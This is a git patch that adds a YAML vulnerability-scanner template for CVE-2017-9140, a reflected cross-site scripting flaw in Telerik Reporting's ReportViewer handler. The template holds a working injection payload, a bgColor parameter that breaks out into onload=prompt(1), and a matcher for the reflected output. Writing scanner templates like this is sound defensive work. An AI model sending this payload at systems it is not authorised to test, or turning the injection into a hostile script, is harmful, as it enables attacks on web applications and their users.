From 6c79bfa14db00bcf85670559be080933249c63fc Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 9 Jun 2021 18:40:47 +0530
Subject: [PATCH] Create CVE-2017-9140.yaml

---
 cves/2017/CVE-2017-9140.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 cves/2017/CVE-2017-9140.yaml

diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml
new file mode 100644
index 0000000000..d39597fd1a
--- /dev/null
+++ b/cves/2017/CVE-2017-9140.yaml
@@ -0,0 +1,18 @@
+id: CVE-2017-9140
+
+info:
+  name: CVE-2017-9140
+  author: dhiyaneshDk
+  severity: medium
+  tags: cve2017,xss,telerik
+  reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
+    matchers:
+      - type: word
+        words:
+          - '<body style="background-color: #000000;" onload="prompt(1);">'
+        condition: and